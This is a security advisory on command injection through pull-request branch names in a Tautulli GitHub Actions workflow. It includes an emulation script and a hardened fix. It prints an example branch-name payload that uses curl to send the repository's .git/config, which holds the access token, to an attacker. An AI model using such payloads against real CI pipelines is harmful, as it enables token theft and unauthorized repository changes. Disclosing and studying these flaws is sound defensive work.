February 24, 2021

GHSL-2021-016: Unauthorized repository modification or secrets exfiltration in a GitHub workflow of Tautulli

Jaroslav Lobacevski

Coordinated Disclosure Timeline


The pull-requests.yml GitHub workflow is vulnerable to unauthorized modification of the base repository or secrets exfiltration from a Pull Request.


Tautulli/Tautulli repository

Tested Version

The latest changeset of pull-requests.yml as of the report date.


Issue: A branch name from the pull request is used to format a shell command

Note that the vulnerability is present in multiple branches: a pull_request_target workflow runs the workflow definition from the base branch (the branch the pull request targets), so every base branch that carries this version of pull-requests.yml is exploitable.

    on:
      pull_request_target:   # runs in the base repository's context, with its GITHUB_TOKEN and secrets
        types: [opened, synchronize, edited, reopened]
    # ... rest of the job definition not shown in the advisory; the vulnerable step is:
          - name: Fail Workflow
            if: github.base_ref != 'nightly'
            run: |
              echo Base: ${{ github.base_ref }}
              echo Head: ${{ github.head_ref }}   # PR branch name, chosen by the attacker, is substituted as text into the script
              exit 1


This vulnerability allows arbitrary command injection into the step's bash script, which in turn allows unauthorized modification of the base repository and exfiltration of its secrets. The expression ${{ github.head_ref }} is substituted as plain text into the run script before the shell parses it, so shell metacharacters in the branch name become part of the command; and because the workflow is triggered by pull_request_target, the script runs with a GITHUB_TOKEN that has write access to the base repository and with access to its secrets. Git ref names may not contain spaces, but they may contain ;, $, {, } and #, which is enough. For example, a PR from a branch named a;${IFS}curl${IFS}-d${IFS}@.git/config${IFS}${IFS}# would exfiltrate the repository token to the attacker-controlled server: the ; terminates the echo command, each ${IFS} is expanded by bash into whitespace in place of a space, curl -d @.git/config posts the checked-out repository's .git/config (where actions/checkout persists the GITHUB_TOKEN by default), and the trailing # comments out whatever follows the expression on that line.
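The following shell script is an added example, not code from the advisory or from the Tautulli project. It emulates what the Actions runner does with a run: script (textual substitution of the expression, then execution by a shell) using a constructed branch name whose injected command prints INJECTED instead of calling curl, and sets the vulnerable step beside the hardened form in which the expression is passed through an environment variable. The function names and the HEAD_REF variable are this example's own choices.

```shell
#!/bin/sh
# Added example (not from the advisory or Tautulli): emulates how the runner
# handles a `run:` script. The `${{ ... }}` expression is substituted as plain
# text into the script *before* the shell parses it, so shell metacharacters in
# github.head_ref become part of the command line.

# Constructed attacker-chosen branch name (assumption: a real payload would run
# curl; here the injected command just prints INJECTED so the effect is visible).
# ${IFS} stands in for the spaces a ref name may not contain, ';' terminates the
# echo command, and '#' comments out whatever follows on that line.
ATTACKER_BRANCH='a;${IFS}echo${IFS}INJECTED;#'

# Vulnerable step, as in pull-requests.yml:
#   run: echo Head: ${{ github.head_ref }}
# The runner builds the script text by substitution and then executes it, so the
# shell parses the attacker's branch name as code.
run_vulnerable_step() {
  head_ref="$1"
  script="echo Head: ${head_ref}"   # textual substitution of the expression
  sh -c "$script"
}

# Hardened step: the expression goes into an environment variable and the script
# references the variable. The shell expands $HEAD_REF to its value once and
# never re-parses that value, so metacharacters in the branch name are inert.
#   env:
#     HEAD_REF: ${{ github.head_ref }}
#   run: echo "Head: $HEAD_REF"
run_hardened_step() {
  HEAD_REF="$1" sh -c 'echo "Head: $HEAD_REF"'
}

# Second output line of the vulnerable step: "INJECTED" when the injection ran.
injected_line() {
  run_vulnerable_step "$ATTACKER_BRANCH" | sed -n '2p'
}

# The hardened step prints the branch name verbatim on a single line.
hardened_line() {
  run_hardened_step "$ATTACKER_BRANCH"
}

echo "--- vulnerable step ---"
run_vulnerable_step "$ATTACKER_BRANCH"
echo "--- hardened step ---"
run_hardened_step "$ATTACKER_BRANCH"
```

The same reasoning applies to any other attacker-controlled expression used directly in a run script (PR title, body, commit message, issue title): route it through env: and quote the variable in the script rather than interpolating the expression into the command text.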


This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).


You can contact the GHSL team at ; please include a reference to GHSL-2021-016 in any communication regarding this issue.